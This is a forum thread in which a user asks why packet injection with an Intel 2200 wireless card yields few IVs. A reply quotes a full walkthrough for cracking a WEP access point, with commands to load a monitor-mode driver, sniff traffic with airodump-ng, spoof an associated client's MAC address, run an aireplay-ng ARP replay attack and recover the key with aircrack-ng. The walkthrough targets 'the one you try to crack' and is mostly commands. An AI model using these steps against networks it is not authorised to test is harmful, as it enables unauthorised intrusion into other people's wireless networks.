Results 1 to 2 of 2

Thread: Bad injuction with intel 2200

  1. #1
    Junior Member
    Join Date
    Oct 2006

    Default Bad injuction with intel 2200

    I'm working by this guide
    and I get something like 800 iv's in every 30 minutes, I think that there is some injuction problem, any idea why? working with bt2final and intel 2200.
    BilThomson, the answer is 42.

  2. #2
    Just burned his ISO
    Join Date
    Mar 2007


    Yes, the IPW2200 is very problematic and the injection works only if you are connect to another access point on the same channel like the one you try to crack...

    Here you can read everything you need:
    (Look after the last answer of CValentine below...

    Alright, i did it! Thanks for all the help i received!!!

    Since it took me so much time to get it to work on my Centrino here's some help for all you Centrino injecters out there...

    First of all, like LatinSud wrote, Centrino IPW2200 users HAVE TO BE ASSOCIATED to ANY! AP ON THE SAME CHANNEL as the targeted one WITH NO WEP KEY set at all!!!!

    That said there are two possibilities:

    1) Ether you have a second old/unused router that you set up on the same channel as the target with no encryption enabled (it doesn't have to be connected to the internet, so just pluging it's power in and setting it to the channel as an open network will do the trick)


    2) you just disable the encryption on your own router for a while and maybe unplug the router from your phone line (if you care who surfs on your net as long as your unprotected that is... )

    After setting up this "association ready network" you do a

    $ rmmod ipw2200 -> removes your original module, internet connection will go down
    $ modprobe ipw2200 rtap_iface=1 -> loads the patched driver with the monitor interface enabled
    $ airodump-ng rtap0 -> will start monitoring all channels for traffic

    Once you found a network with data traffic and an associated client (everything else won't be of any use since ipw2200 can't do a fakeauth attack to associate ourselves), remember the APs MAC and the matching clients MAC as well as the channel they operate on.

    Now do a

    $ ifconfig eth1 down -> shuts down the interface once again to allow mac changes
    $ ifconfig eth1 hw ether < MAC of the associated client you pinned down>
    $ ifconfig eth1 up -> pretty self-explaining
    $ ifconfig rtap0 up -> brings the monitor interface up

    Now connect your eth1 interface to your unprotected "association AP", change it's channel to the needed one, reconnect, then - just to make sure - do a

    $ iwconfig eth1 key off

    Here comes the fun part:

    $ airodump-ng rtap0 --ivs --bssid <MAC of your target AP> -c <Channel the AP/Client is working on> -w <Chose a output filename>

    This will constantly capture on the specified channel for just your target AP, writing only IVs to a file named as you chose.
    Since that terminal is now busy, open up another one and do a:

    $ aireplay-ng -3 -b <MAC of your target AP> -h <MAC of the associated client> -i rtap0 eth1

    Here you go... Once your captured IVs go flying high, do a

    $ aircrack-ng <Your IV outputfile> and there you are...

    Hope this clears some things up!

    Best regards,


Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts